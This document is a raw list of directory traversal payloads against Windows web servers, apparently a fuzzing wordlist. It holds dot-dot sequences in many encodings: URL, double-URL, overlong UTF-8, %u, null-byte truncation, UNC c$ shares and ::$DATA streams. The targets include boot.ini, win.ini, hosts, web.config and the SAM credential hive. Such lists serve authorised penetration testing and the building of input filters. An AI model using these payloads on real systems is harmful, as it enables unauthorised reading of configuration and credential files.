....\boot.ini
......\boot.ini
........\boot.ini
............\boot.ini
................\boot.ini
....\windows\win.ini
......\windows\win.ini
........\windows\win.ini
............\windows\win.ini
....................\windows\win.ini^^
....\windows\system32\drivers\etc\hosts
........\windows\system32\drivers\etc\hosts
......\windows\win.ini%00
....\boot.ini%00
....\boot.ini
......\boot.ini
........\boot.ini
............\boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../../boot.ini
../../boot.ini%00.jpg
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../../../../../windows/win.ini
../../../../../../../../windows/win.ini
../../windows/system32/drivers/etc/hosts
../../../../windows/system32/drivers/etc/hosts
../../windows/win.ini%00
../../../../windows/win.ini%00
../../boot.ini%00
../../../../boot.ini%00
C:\boot.ini
C:/boot.ini
C:\windows\win.ini
C:/windows/win.ini
C:\windows\system32\drivers\etc\hosts
C:/windows/system32/drivers/etc/hosts
C:\inetpub\wwwroot\web.config
C:/inetpub/wwwroot/web.config
C:\inetpub\wwwroot\web.config
C:/inetpub/wwwroot/web.config
\windows\win.ini
/windows/win.ini
%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
%2e%2e%2fboot.ini
%2e%2e%2f%2e%2e%2fboot.ini
%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%2fwindows%2fwin.ini
%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
%2e%2e%2fwindows%2fwin.ini
%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
%2e%2e%2fboot.ini
%2e%2e%2f%2e%2e%2fboot.ini
%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%252e%252e%255cboot.ini
%252e%252e%255c%252e%252e%255cboot.ini
%252e%252e%252fboot.ini
%252e%252e%252f%252e%252e%252fboot.ini
%252e%252e%255cwindows%255cwin.ini
%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%252e%252e%252fwindows%252fwin.ini
%252e%252e%252f%252e%252e%252fwindows%252fwin.ini
%252e%252e%252fwindows%252fwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fwin.ini
%252e%252e%252fboot.ini
%252e%252e%252f%252e%252e%252fboot.ini
%252e%252e%255cwindows%255cwin.ini
%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
%252e%252e%255cboot.ini
..%c0%afboot.ini
..%c0%af..%c0%afboot.ini
..%c1%9cboot.ini
..%c1%9c..%c1%9cboot.ini
..%c0%afwindows/win.ini
..%c1%9cwindows\win.ini
..%c0%af..%c0%afwindows/win.ini
..%c1%9c..%c1%9cwindows\win.ini
..%c0%afboot.ini
..%c0%af..%c0%afboot.ini
..%c0%afwindows/win.ini
..%c0%af..%c0%afwindows/win.ini
..%c1%9cboot.ini
..%c1%9c..%c1%9cboot.ini
%u002e%u002e%u005cboot.ini
%u002e%u002e%u005c%u002e%u002e%u005cboot.ini
%u002e%u002e%u002fboot.ini
%u002e%u002e%u005cwindows%u005cwin.ini
%u002e%u002e%u002fwindows%u002fwin.ini
%u002e%u002e%u002fwindows%u002fwin.ini
%u002e%u002e%u005c%u002e%u002e%u005cwindows%u005cwin.ini
%u002e%u002e%u005cwindows%u005cwin.ini
....\boot.ini%00
......\windows\win.ini%00
../../boot.ini%00.jpg
../../windows/win.ini%00.html
......\windows\win.ini%00.php
............\windows\win.ini%00.txt
../../windows/win.ini%00.jpg
../../windows/win.ini%00.html
....\windows\win.ini%00
....\boot.ini%00
../../boot.ini%00
../../../../boot.ini%00
../../../../windows/win.ini%00
....\boot.ini
....\....\boot.ini
....//boot.ini
....//....//boot.ini
....\windows\win.ini
....//windows//win.ini
....\windows\win.ini
........\windows\win.ini
............\windows\win.ini
................\windows\win.ini
....//windows/win.ini
....//....//windows/win.ini
....//....//....//windows/win.ini
....................\windows\win.ini^^
%2e%2e/windows/win.ini
%2e%2e\windows\win.ini
%252e%252e\windows\win.ini
..%2fwindows%2fwin.ini
..%5cwindows%5cwin.ini
..%252fwindows%252fwin.ini
..%255cwindows%255cwin.ini
..%2fwindows%2fwin.ini
..%5cwindows%5cwin.ini
\127.0.0.1\c$\boot.ini
\localhost\c$\boot.ini
\127.0.0.1\c$\windows\win.ini
\localhost\c$\windows\win.ini
\localhost\c$\windows\win.ini
\127.0.0.1\c$\windows\win.ini
\localhost\c$\boot.ini
....................\inetpub\wwwroot\web.config
....................\windows\system32\config\SAM
....................\windows\system32\config\AppEvent.Evt
....................\windows\system32\config\SecEvent.Evt
windows/win.ini::$DATA
boot.ini::$DATA
../../windows/win.ini::$DATA
../../boot.ini::$DATA
